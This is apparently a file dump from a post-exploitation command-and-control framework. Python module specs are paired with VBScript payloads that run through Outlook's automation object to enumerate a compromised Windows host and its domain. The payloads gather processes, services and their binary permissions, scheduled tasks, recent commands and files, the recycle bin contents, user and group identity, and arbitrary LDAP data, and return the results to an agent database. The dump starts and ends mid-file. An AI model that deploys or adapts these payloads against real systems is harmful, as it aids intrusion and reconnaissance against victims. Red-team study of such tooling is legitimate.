self.help = """
Enumerates the installed Office Architecture on the host.
This module writes the result to agent in the database.
It retrieves the bitness from the Path value under
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\outlook.exe.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).GetStringValue
"""
self.entry = 'list_officearch'
self.depends = []
super().__init__(templatepath)
def rethandler(self, agent, options, data):
agent.officearch = data
================================================
FILE: functions/enumerate/host/list_officearch.txt
================================================
Function list_officearch()
On Error Resume Next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\outlook.exe", "Path", strPath
if InStr(strPath, "x86") > 0 Then
list_officearch = "x86"
else
list_officearch = "x64"
end if
End Function
================================================
FILE: functions/enumerate/host/list_printers.py
================================================
from lib.core.specmodule import SpecModule
from datetime import datetime
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Uses wscript.network to gather printer connections
It uses Wscript.Network
- EnumPrinterConnections
"""
self.entry = 'list_printers'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_printers.txt
================================================
Function list_printers()
On error resume next
Set wsh = window.external.OutlookApplication.CreateObject("Wscript.Network")
Set printers = wsh.EnumPrinterConnections
For i = 0 to printers.Count - 1 Step 2
output = output & "Printername: " & printers.Item(i+1) & " - Port: " & printers.Item(i) & vbCrLf
Next
list_printers = "Found " & printers.count & " printers:" & vbCrLf & output
End Function
================================================
FILE: functions/enumerate/host/list_processes.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates running processes on the host.
It lists out:
- PID
- PPID
- Arch based on virtual size (x86 set to less than 4094967296 Bytes, could be FP here) - Double check using operation-file-check_filearch
- Process Name
- Executable Path
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process
"""
self.entry = 'list_processes'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_processes.txt
================================================
Function list_processes()
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set col = objWMIService.ExecQuery ("Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process")
procs = "PID" & vbTab & "PPID" & vbTab & "Arch" & vbTab & "ProcessName" & vbTab & vbTab & vbTab & "Executable Path" & vbCrLf
For Each obj in col
if obj.VirtualSize < 4000000000 Then
procarch = "x86"
if obj.processid = "0" then
procarch = "x64"
end if
if obj.processid = "4" then
procarch = "x64"
end if
else
procarch = "x64"
end if
if obj.Name = "Memory Compression" Then
procarch = "x64"
end if
if obj.Name = "Registry" Then
procarch = "x64"
end if
procs = procs & obj.ProcessId & vbTab & obj.ParentProcessId & vbTab & procarch & vbTab & obj.Name & vbTab & vbTab & vbTab & obj.ExecutablePath & vbCrLf
Next
list_processes = procs
End Function
================================================
FILE: functions/enumerate/host/list_recentcommands.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates recent executed commands from the registry
HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
It uses WbemScripting.SWbemNamedValueSet
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).EnumValues
- ConnectServer(root\cimv2).GetStringValue
- ConnectServer(root\cimv2).GetExpandedStringValue
- ConnectServer(root\cimv2).GetBinaryValue
- ConnectServer(root\cimv2).GetDWORDValue
- ConnectServer(root\cimv2).GetMultiStringValue
- ConnectServer(root\cimv2).GetQWORDValue
"""
self.entry = 'list_recentcommands'
self.depends = ['./helperFunctions/Getallregvalues.txt']
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_recentcommands.txt
================================================
Function list_recentcommands()
On error resume next
list_recentcommands = "RECENT COMMANDS:" & vbCrLf
list_recentcommands = list_recentcommands & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU", 64, 2147483649)
End Function
================================================
FILE: functions/enumerate/host/list_recentfiles.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates all shortcuts in the MY_RECENT_DOCUMENTS / RECENT_FILES
Resolved all shortcuts to the items and lists them out
It uses WScript.Shell
- CreateShortcut
It uses Shell.Application
- Namespace
- Namespace().items
"""
self.entry = 'list_recentfiles'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_recentfiles.txt
================================================
Function list_recentfiles()
On error resume next
Const MY_RECENT_DOCUMENTS = &H8&
recentpaths = "RECENT PATHS:" & vbCrLf
set WshShell = window.external.OutlookApplication.CreateObject("WScript.Shell")
Set objShell = window.external.OutlookApplication.CreateObject("Shell.Application")
Set objFolder = objShell.Namespace(MY_RECENT_DOCUMENTS)
Set colItems = objFolder.Items
For Each objItem in colItems
Set oShellLink = WshShell.CreateShortcut(objItem.path)
if Len(oShellLink.TargetPath) = 0 then
else
recentpaths = recentpaths & oShellLink.TargetPath & vbCrLf
end if
Next
list_recentfiles = recentpaths
End Function
================================================
FILE: functions/enumerate/host/list_recyclebin.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
This module reads lists the content of the recycle bin
for the current user. To download a file use get_file and
use the long path in the output from this module.
It uses CreateObject("Shell.Application")
"""
self.entry = 'list_recyclebin'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_recyclebin.txt
================================================
Function list_recyclebin()
On error resume next
Set sa = window.external.OutlookApplication.CreateObject("Shell.Application")
Set items = sa.Namespace(10).Items()
output = "Name - MB - FullPath" & vbCrLF
sizeround = 1048576
x = 0
Do until x = items.count
friendlysize = Round(items.item(x).size / sizeround, 1)
output = output & items.item(x).name & " - " & friendlysize & " - " & items.item(x).path & vbCrLF
x=x+1
Loop
ml1 = 0
ml2 = 0
ml3 = 0
lines=split(output,vbcrlf)
for each line in lines
parts = Split(line, " - ")
If Len(parts(0)) > ml1 Then
ml1 = Len(parts(0))
End If
If Len(parts(1)) > ml2 Then
ml2 = Len(parts(1))
End If
If Len(parts(2)) > ml3 Then
ml3 = Len(parts(2))
End If
next
For Each line In lines
parts = Split(line, " - ")
spacesToAdd1 = ml1 - Len(parts(0))
spacesToAdd2 = ml2 - Len(parts(1))
spacesToAdd3 = ml3 - Len(parts(2))
line = parts(0) & String(spacesToAdd1, " ") & " " & parts(1) & String(spacesToAdd2, " ") & " " & parts(2) & String(spacesToAdd3, " ")
list_recyclebin = list_recyclebin & line & vbCrLF
Next
End Function
================================================
FILE: functions/enumerate/host/list_scheduledtasks.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the scheduled tasks on the host.
It uses WbemScripting.SWbemLocator
- ConnectServer(ROOT\Microsoft\Windows\TaskScheduler)
- Query: SELECT * FROM MSFT_ScheduledTask
"""
self.entry = 'list_scheduledtasks'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_scheduledtasks.txt
================================================
Function list_scheduledtasks()
On error resume next
Const wbemFlagReturnImmediately = &h10
Const wbemFlagForwardOnly = &h20
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "ROOT\Microsoft\Windows\TaskScheduler")
Set col = objWMIService.ExecQuery ("SELECT * FROM MSFT_ScheduledTask", "WQL", wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem in col
schedtasks = schedtasks & vbCrLf & "TaskName: " & objItem.TaskName
schedtasks = schedtasks & vbCrLf & "TaskPath: " & objItem.TaskPath
schedtasks = schedtasks & vbCrLf & "Source: " & objItem.Source
schedtasks = schedtasks & vbCrLf & "State: " & objItem.State
schedtasks = schedtasks & vbCrLf & "URI: " & objItem.URI
schedtasks = schedtasks & vbCrLf & "Author: " & objItem.Author
schedtasks = schedtasks & vbCrLf & "Date: " & objItem.Date
schedtasks = schedtasks & vbCrLf & "Description: " & objItem.Description
schedtasks = schedtasks & vbCrLf & "Actions Details:"
For Each objAction In objItem.Actions
schedtasks = schedtasks & vbCrLf & " ClassId: " & objAction.ClassId
schedtasks = schedtasks & vbCrLf & " Data: " & objAction.Data
schedtasks = schedtasks & vbCrLf & " Arguments: " & objAction.Arguments
schedtasks = schedtasks & vbCrLf & " Execute: " & objAction.Execute
Next
Set objPrincipal = objItem.Principal
schedtasks = schedtasks & vbCrLf & "Principal Details:"
schedtasks = schedtasks & vbCrLf & " GroupId: " & objPrincipal.GroupId
schedtasks = schedtasks & vbCrLf & " Id: " & objPrincipal.Id
schedtasks = schedtasks & vbCrLf & " LogonType: " & objPrincipal.LogonType
schedtasks = schedtasks & vbCrLf & " RunLevel: " & objPrincipal.RunLevel
schedtasks = schedtasks & vbCrLf & " UserId: " & objPrincipal.UserId
schedtasks = schedtasks & vbCrLf & " ProcessTokenSidType: " & objPrincipal.ProcessTokenSidType
Set objPrincipal = Nothing
schedtasks = schedtasks & vbCrLf & "SecurityDescriptor: " & objItem.SecurityDescriptor
Set objSettings = objItem.Settings
schedtasks = schedtasks & vbCrLf & "Settings Details:"
schedtasks = schedtasks & vbCrLf & " AllowDemandStart: " & objSettings.AllowDemandStart
schedtasks = schedtasks & vbCrLf & " AllowHardTerminate: " & objSettings.AllowHardTerminate
schedtasks = schedtasks & vbCrLf & " Compatibility: " & objSettings.Compatibility
schedtasks = schedtasks & vbCrLf & " DeleteExpiredTaskAfter: " & objSettings.DeleteExpiredTaskAfter
schedtasks = schedtasks & vbCrLf & " DisallowStartIfOnBatteries: " & objSettings.DisallowStartIfOnBatteries
schedtasks = schedtasks & vbCrLf & " Enabled: " & objSettings.Enabled
schedtasks = schedtasks & vbCrLf & " ExecutionTimeLimit: " & objSettings.ExecutionTimeLimit
schedtasks = schedtasks & vbCrLf & " Hidden: " & objSettings.Hidden
schedtasks = schedtasks & vbCrLf & " IdleSettings: " & objSettings.IdleSettings
schedtasks = schedtasks & vbCrLf & " MultipleInstances: " & objSettings.MultipleInstances
schedtasks = schedtasks & vbCrLf & " Priority: " & objSettings.Priority
schedtasks = schedtasks & vbCrLf & " RestartCount: " & objSettings.RestartCount
schedtasks = schedtasks & vbCrLf & " RestartInterval: " & objSettings.RestartInterval
schedtasks = schedtasks & vbCrLf & " RunOnlyIfIdle: " & objSettings.RunOnlyIfIdle
schedtasks = schedtasks & vbCrLf & " StartWhenAvailable: " & objSettings.StartWhenAvailable
schedtasks = schedtasks & vbCrLf & " StopIfGoingOnBatteries: " & objSettings.StopIfGoingOnBatteries
schedtasks = schedtasks & vbCrLf & " WakeToRun: " & objSettings.WakeToRun
Set objSettings = Nothing
schedtasks = schedtasks & vbCrLf & "Settings: " & objItem.Settings
schedtasks = schedtasks & vbCrLf & "Triggers Details:"
For Each objTrigger In objItem.Triggers
schedtasks = schedtasks & vbCrLf & " Id: " & objTrigger.Id
schedtasks = schedtasks & vbCrLf & " RandomDelay: " & objTrigger.RandomDelay
schedtasks = schedtasks & vbCrLf & " DaysInterval: " & objTrigger.DaysInterval
schedtasks = schedtasks & vbCrLf & " StartBoundary: " & objTrigger.StartBoundary
schedtasks = schedtasks & vbCrLf & " Enabled: " & objTrigger.Enabled
schedtasks = schedtasks & vbCrLf & " StateChange: " & objTrigger.StateChange
Set objRepetition = objTrigger.Repetition
schedtasks = schedtasks & vbCrLf & " Repetition Details: "
schedtasks = schedtasks & vbCrLf & " StopAtDurationEnd: " & objRepetition.StopAtDurationEnd
schedtasks = schedtasks & vbCrLf & " Duration: " & objRepetition.Duration
schedtasks = schedtasks & vbCrLf & " Interval: " & objRepetition.Interval
set objRepetition = Nothing
Next
schedtasks = schedtasks & vbCrLf
Next
list_scheduledtasks = schedtasks
End Function
================================================
FILE: functions/enumerate/host/list_servicepermissions.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the services and the permissions on the host.
It lists out:
- Service Name
- Service Binary path
- Group name and Access
Example Output:
Enumerating Permissions for: UserDataSvc_3dc16
C:\Windows\system32\svchost.exe
GROUP: NT SERVICE\TRUSTEDINSTALLER
binPath: C:\Windows\system32\svchost.exe
Sanity Check - Access Mask Value To Match: 2032127
ACE Type: Allow
Access Mask (Decimal): 2032127 (FullControl)
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: Select * from Win32_Service
- Query: Select * from win32_logicalFileSecuritySetting WHERE Path=VARIABLE
"""
self.entry = 'list_servicepermissions'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_servicepermissions.txt
================================================
Function list_servicepermissions()
' ACE Types
Const ACCESS_ALLOWED_ACE_TYPE = &h0
Const ACCESS_DENIED_ACE_TYPE = &h1
' Base Access Mask values
Const FILE_READ_DATA = &h1
Const FILE_WRITE_DATA = &h2
Const FILE_APPEND_DATA = &h4
Const FILE_READ_EA = &h8
Const FILE_WRITE_EA = &h10
Const FILE_EXECUTE = &h20
Const FILE_DELETE_CHILD = &h40
Const FILE_READ_ATTRIBUTES = &h80
Const FILE_WRITE_ATTRIBUTES = &h100
Const FOLDER_DELETE = &h10000
Const READ_CONTROL = &h20000
Const WRITE_DAC = &h40000
Const WRITE_OWNER = &h80000
Const SYNCHRONIZE = &h100000
' Constructed Access Masks
Dim FULL_CONTROL
FULL_CONTROL = FILE_READ_DATA + FILE_WRITE_DATA + FILE_APPEND_DATA + _
FILE_READ_EA + FILE_WRITE_EA + FILE_EXECUTE + FILE_DELETE_CHILD + _
FILE_READ_ATTRIBUTES + FILE_WRITE_ATTRIBUTES + FOLDER_DELETE + _
READ_CONTROL + WRITE_DAC + WRITE_OWNER + SYNCHRONIZE
Dim READ_ONLY
READ_ONLY = FILE_READ_DATA + FILE_READ_EA + FILE_EXECUTE + _
FILE_READ_ATTRIBUTES + READ_CONTROL + SYNCHRONIZE
Dim MODIFY
MODIFY = FILE_READ_DATA + FILE_WRITE_DATA + FILE_APPEND_DATA + _
FILE_READ_EA + FILE_WRITE_EA + FILE_EXECUTE + _
FILE_READ_ATTRIBUTES + _
FILE_WRITE_ATTRIBUTES + FOLDER_DELETE + READ_CONTROL + SYNCHRONIZE
Dim strRights
Dim intAccessMask
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set col = objWMIService.ExecQuery ("Select * from Win32_Service")
For Each objService in col
if InStr(objService.PathName,"{") then
binarray = split(objService.PathName, " ", -1, 1)
binpathStr = binarray(0)
elseif InStr(objService.PathName,"-") then
binarray = split(objService.PathName, "-", -1, 1)
binpathStr = binarray(0)
elseif InStr(objService.PathName,"/") then
binarray = split(objService.PathName, "/", -1, 1)
binPathStr = Replace(binarray(0), chr(34), "")
binpathStr = binarray(0)
else
binpathStr = objService.PathName
end if
sanbin = trim(Replace(binarray(0), chr(34), ""))
toreturn = toreturn & "Enumerating Permissions for: " & objService.Name & vbCrLf
toreturn = toreturn & sanbin & vbCrLf
strDir = Replace(sanbin,"\","\\")
Set colACLs = objWMIService.ExecQuery("Select * from win32_logicalFileSecuritySetting WHERE Path='" & strDir & "'",,48)
for each objItem in colACLs
If objItem.GetSecurityDescriptor(objSD) Then
DisplayFileSecurity = False
End If
colACEs = objSD.DACL
for each objACE in colACEs
strAccessList = objACE.Trustee.Domain & "\" & objACE.Trustee.Name
if left(strAccessList,1) = "\" then
strAccessList = right(strAccessList,len(strAccessList) -1)
end if
toreturn = toreturn & " GROUP: " & Ucase(strAccessList) & vbCrLf
toreturn = toreturn & vbTab & "binPath: " & Replace(strDir,"\\","\") & vbCrLf
if objACE.AceType = 0 Then
toreturn = toreturn & vbTab & "Sanity Check - Access Mask Value To Match: " & objACE.AccessMask & vbCrLf
If objACE.ACEType = ACCESS_ALLOWED_ACE_TYPE Then
toreturn = toreturn & vbTab & " ACE Type: Allow" & vbCrLf
Else
toreturn = toreturn & vbTab & " ACE Type: Deny" & vbCrLf
End If
strRights = ""
intAccessMask = objACE.AccessMask
If intAccessMask = FULL_CONTROL Then
strRights = " (FullControl)"
ElseIf intAccessMask = MODIFY Then
strRights = " (Modify)"
ElseIf intAccessMask = READ_ONLY Then
strRights = " (ReadOnly)"
End If
toreturn = toreturn & vbTab & " Access Mask (Decimal): " & intAccessMask & strRights & vbCrLf
elseif objACE.AceType = 1 Then
toreturn = toreturn & vbTab & "User does not have access - " & objACE.AceType & vbCrLf
end if
Next
Next
Next
list_servicepermissions = toreturn & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_services.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the services and status on the host.
It lists out:
- Service name
- State (Stopped|Started)
- Name (Name of the running account for the service)
- BinPath
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: Select * from Win32_Service
"""
self.entry = 'list_services'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_services.txt
================================================
Function list_services()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set col = objWMIService.ExecQuery ("Select * from Win32_Service")
For Each objService in col
services = services & vbCrLf & objService.Name & vbCrLf & " State:" & objService.State & vbCrLf & " Name: " & objService.StartName & vbCrLf & " BinPath:" & objService.PathName
Next
list_services = services
End Function
================================================
FILE: functions/enumerate/host/list_startmenu.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Lists the structure and items in the start menu.
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- Query: Select Name from Win32_LogicalProgramGroupItem
"""
self.entry = 'list_startmenu'
self.depends = []
super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_startmenu.txt
================================================
Function list_startmenu()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set colItems = objWMIService.ExecQuery("Select Name from Win32_LogicalProgramGroupItem")
For Each objItem in colItems
list_startmenu = list_startmenu & objItem.Name & vbCrLF
Next
End Function
================================================
FILE: functions/enumerate/host/list_timezone.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Finds the name of the current timezone for the agent
It uses WbemScripting.SWbemNamedValueSet
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\cimv2)
- ConnectServer(root\cimv2).GetStringValue
"""
self.entry = 'list_timezone'
self.depends = []
super().__init__(templatepath)
def rethandler(self, agent, options, data):
agent.timezone = data
================================================
FILE: functions/enumerate/host/list_timezone.txt
================================================
Function list_timezone()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
objreg.GetStringValue 2147483650, "SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "TimeZoneKeyName", strtimezone
list_timezone = strtimezone
End Function
================================================
FILE: functions/enumerate/host/list_whoami.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Whoami with limited information. Missing privileges since there is no way to get
that without API access or running external binaries
It uses CreateObject("Wscript.Shell")
It uses WbemScripting.SWbemLocator
- ConnectServer(root\directory\LDAP)
- Query: "SELECT DS_memberOf FROM ds_user Where DS_sAMAccountName = '" & strUsername & "'"
- ConnectServer(root\cimv2)
- Query: "SELECT * FROM Win32_UserProfile Where SID='" & strSID & "'"
"""
self.entry = 'list_whoami'
self.depends = []
super().__init__(templatepath)
def rethandler(self, agent, options, data):
for line in data.split("\n"):
if line.startswith("SID:"):
sid = line.split()[1]
if sid:
agent.sid = sid
================================================
FILE: functions/enumerate/host/list_whoami.txt
================================================
Function list_whoami()
on error resume next
Set objShell = window.external.OutlookApplication.CreateObject("WScript.Shell")
output = "USER INFORMATION" & vbCrLF
output = output & "----------------" & vbCrLF
strUsername = objShell.RegRead("HKEY_CURRENT_USER\Volatile Environment\username")
strUserDNSDomain = objShell.RegRead("HKEY_CURRENT_USER\Volatile Environment\userdnsdomain")
strUserDomain = objShell.RegRead("HKEY_CURRENT_USER\Volatile Environment\userdomain")
if strUserDNSDomain = "" then
strUserDNSDomain "WORKGROUP"
end if
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
objreg.EnumKey 2147483651, "", arrSubKeys
For Each strSubKey In arrSubKeys
If Left(strSubKey, 6) = "S-1-5-" Then
strVolatileEnvKeyPath = strSubKey & "\Volatile Environment"
strVolatileEnvValueName = "USERNAME"
objreg.GetStringValue 2147483651, strVolatileEnvKeyPath, strVolatileEnvValueName, strUserValue
If StrComp(strUserValue, strUsername, vbTextCompare) = 0 Then
strSID = strSubKey
Exit For
End If
End If
Next
output = output & "Username: " & strUsername & vbCrLF
output = output & "DNS Domain: " & strUserDNSDomain & vbCrLF
output = output & "Domain: " & strUserDomain & vbCrLF
output = output & "SID: " & strSID & vbCrLF
output = output & vbCrLF
output = output & "GROUP INFORMATION" & vbCrLF
output = output & "----------------" & vbCrLF
Set objLDAP = objLocator.ConnectServer(".", "\root\directory\LDAP")
Set colItems = objLDAP.ExecQuery("SELECT DS_memberOf FROM ds_user Where DS_sAMAccountName = '" & strUsername & "'")
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Next
output = output & Returndata & vbCrLF
output = output & "OTHER INFORMATION" & vbCrLF
output = output & "----------------------" & vbCrLF
Set objwmi = objLocator.ConnectServer(".", "root\cimv2")
Set userStateInfo = objwmi.ExecQuery("SELECT * FROM Win32_UserProfile Where SID='" & strSID & "'")
For Each userInfo in userStateInfo
output = output & "RoamingConfigured: " & userInfo.RoamingConfigured & vbCrLF
output = output & "RoamingPath: " & userInfo.RoamingPath & vbCrLF
output = output & "LocalPath: " & userInfo.LocalPath & vbCrLF
Next
list_whoami = output
End Function
================================================
FILE: functions/enumerate/host/list_windowsarch.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the Windows Architecture on the host.
This module writes the result to agent in the database.
Arch value is found under:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment - PROCESSOR_ARCHITECTURE.
It uses WbemScripting.SWbemLocator
- ConnectServer
- ConnectServer(root\cimv2).GetStringValue
"""
self.entry = 'list_windowsarch'
self.depends = []
super().__init__(templatepath)
def rethandler(self, agent, options, data):
agent.windowsarch = data
================================================
FILE: functions/enumerate/host/list_windowsarch.txt
================================================
Function list_windowsarch()
On Error Resume Next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
objreg.GetStringValue 2147483650, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "PROCESSOR_ARCHITECTURE", strArch
if strArch = "AMD64" Then
list_windowsarch = "x64"
else
list_windowsarch = strArch
end if
End Function
================================================
FILE: functions/enumerate/host/list_windowsversion.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates the Current Windows version on the host.
It retrieves data from HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion and lists out:
- ProductName
- ReleaseId
It uses WbemScripting.SWbemLocator
- ConnectServer
- ConnectServer(root\cimv2).GetStringValue
"""
self.entry = 'list_windowsversion'
self.depends = []
super().__init__(templatepath)
def rethandler(self, agent, options, data):
agent.windowsversion = data
================================================
FILE: functions/enumerate/host/list_windowsversion.txt
================================================
Function list_windowsversion()
On Error Resume Next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "ProductName", strProdName
objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "ReleaseId", strRelId
list_windowsversion = strProdName & " - " & strRelId
End Function
================================================
FILE: functions/enumerate/ldap/ldap_query.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring,escapequotes
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
A module to query LDAP with. To find a list of attributes/values to query use WMI Explorer and look under ROOT\directory\LDAP.
Some classes: ds_domain, ds_computer , ds_container , ds_group , ds_top , ds_user
Currently not getting all attributes. Struggling with SWbemObjectEx sub objects.
The WHERE_* is only used if they are specified.
A query without WHERE_* specified looks like this:
SELECT <SELECT OPTION> FROM <FROM OPTION>
A query with WHERE_* specified looks like this:
SELECT <SELECT OPTION> FROM <FROM OPTION> WHERE <WHERE_Attribute> = '<WHERE_Value>'
It uses WbemScripting.SWbemLocator
- ConnectServer(\\root\\directory\\LDAP)
- Query: SELECT <SELECT OPTION> FROM <FROM OPTION> WHERE <WHERE_Attribute> = '<WHERE_Value>'
"""
self.entry = 'ldap_query'
self.depends = []
self.options['SELECT'] = {
"value": "*",
"required": True,
"description": "Attribute to get - Ex: DS_givenName or DS_samaccountname or * for everything"
}
self.options['FROM'] = {
"value": "ds_user",
"required": True,
"description": "What Class to get the attributes from - Ex: ds_user or ds_computer or ds_domain"
}
self.options['WHERE_Attribute'] = {
"value": None,
"required": False,
"description": "Specify attribute Search critera. Only used if specified. Ex: ds_samaccountname"
}
self.options['WHERE_Value'] = {
"value": None,
"required": False,
"description": "Specify what to search for. Ex: user1"
}
self.options['query'] = {
"value": "Will_Be_generated_from_other_options",
"required": True,
"description": "Query that is issued, You do not need to set this option since it is generated based on the other options, only reason this is shown is so you can see it in qlist",
"handler": quotedstring
}
super().__init__(templatepath)
def preprocess(self, agent):
if self.options['WHERE_Attribute']['value'] and self.options['WHERE_Value']['value'] == None:
raise RuntimeError("Need to specify WHERE_Value when you are specifying WHERE_Attribute")
if self.options['WHERE_Value']['value'] and self.options['WHERE_Attribute']['value'] == None:
raise RuntimeError("Need to specify WHERE_Attribute when you are specifying WHERE_Value")
if self.options['WHERE_Attribute']['value'] and self.options['WHERE_Value']['value']:
composed_query = "SELECT " + self.options['SELECT']['value'] + " FROM " + self.options['FROM']['value'] + " Where " + self.options['WHERE_Attribute']['value'] + " = '" + self.options['WHERE_Value']['value'] + "'"
else:
composed_query = "SELECT " + self.options['SELECT']['value'] + " FROM " + self.options['FROM']['value']
self.options['query']['value'] = composed_query
================================================
FILE: functions/enumerate/ldap/ldap_query.txt
================================================
Function ldap_query()
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "\root\directory\LDAP")
Returndata = Returndata & "Running query: " & {{query}} & vbCrLf
Set colItems = objWMIService.ExecQuery({{query}})
For Each PATH in colItems
For Each pathAttribute in PATH.Properties_
Select Case TypeName(pathAttribute.value)
case "String"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Long"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "Boolean"
Returndata = Returndata & pathAttribute.name & ":" & pathAttribute.value & vbCrLf
case "SWbemObjectEx"
'Cannot get this work...
'Returndata = Returndata & pathAttribute.name & vbCrLf
case "Variant()"
Returndata = Returndata & pathAttribute.name & "::" & Join(pathAttribute.value, ",") & vbCrLf
End Select
Next
Returndata = Returndata & vbCrLf
Next
ldap_query = Returndata
End Function
================================================
FILE: functions/enumerate/ldap/list_addcomputertodomain.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Enumerates ms-DS-MachineAccountQuota from LDAP and finds the SeMachineAccountPrivilege in the default domain controller policy
